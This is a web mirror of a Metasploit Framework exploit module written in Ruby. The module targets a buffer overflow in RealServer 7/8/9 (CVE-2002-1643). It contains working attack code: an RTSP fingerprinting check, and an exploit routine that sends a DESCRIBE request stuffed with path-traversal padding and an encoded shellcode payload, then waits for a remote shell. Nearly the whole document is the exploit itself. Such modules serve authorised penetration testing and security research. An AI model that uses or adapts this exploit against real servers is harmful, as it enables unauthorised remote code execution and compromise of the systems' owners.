CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/realserver/describe.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = GreatRanking

9


10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(update_info(info,

14
      'Name'           => 'RealServer Describe Buffer Overflow',

15
      'Description'    => %q{

16
        This module exploits a buffer overflow in RealServer 7/8/9

17
        and was based on Johnny Cyberpunk's THCrealbad exploit. This

18
        code should reliably exploit Linux, BSD, and Windows-based

19
        servers.

20
      },

21
      'Author'         => 'hdm',

22
      'References'     =>

23
        [

24
          [ 'CVE', '2002-1643' ],

25
          [ 'OSVDB', '4468']

26
        ],

27
      'Privileged'     => true,

28
      'Payload'        =>

29
        {

30
          'Space'    => 2000,

31
          'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"

32
        },

33
      'Platform'       => %w{ bsd linux win },

34
      'Targets'        =>

35
        [

36
          [

37
            'Universal',

38
            {

39
              'Platform' => %w{ bsd linux win }

40
            },

41
          ],

42
        ],

43
      'DisclosureDate' => '2002-12-20',

44
      'DefaultTarget' => 0))

45
  end

46


47
  def check

48
    res = send_request_raw(

49
      {

50
        'method' => 'OPTIONS',

51
        'proto'  => 'RTSP',

52
        'version' => '1.0',

53
        'uri'    => '/'

54
      }, 5)

55


56
    info = http_fingerprint({ :response => res })  # check method / Custom server check

57
    if res and res['Server']

58
      vprint_status("Found RTSP: #{res['Server']}")

59
      return Exploit::CheckCode::Detected

60
    end

61
    Exploit::CheckCode::Safe

62
  end

63


64
  def exploit

65
    print_status("RealServer universal exploit launched against #{rhost}")

66
    print_status("Kill the master rmserver pid to prevent shell disconnect")

67


68
    encoded = Rex::Text.to_hex(payload.encoded, "%")

69


70
    res = send_request_raw({

71
      'method' => 'DESCRIBE',

72
      'proto'  => 'RTSP',

73
      'version' => '1.0',

74
      'uri'    => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"

75
    }, 5)

76


77
    handler

78
  end

79
end

80


81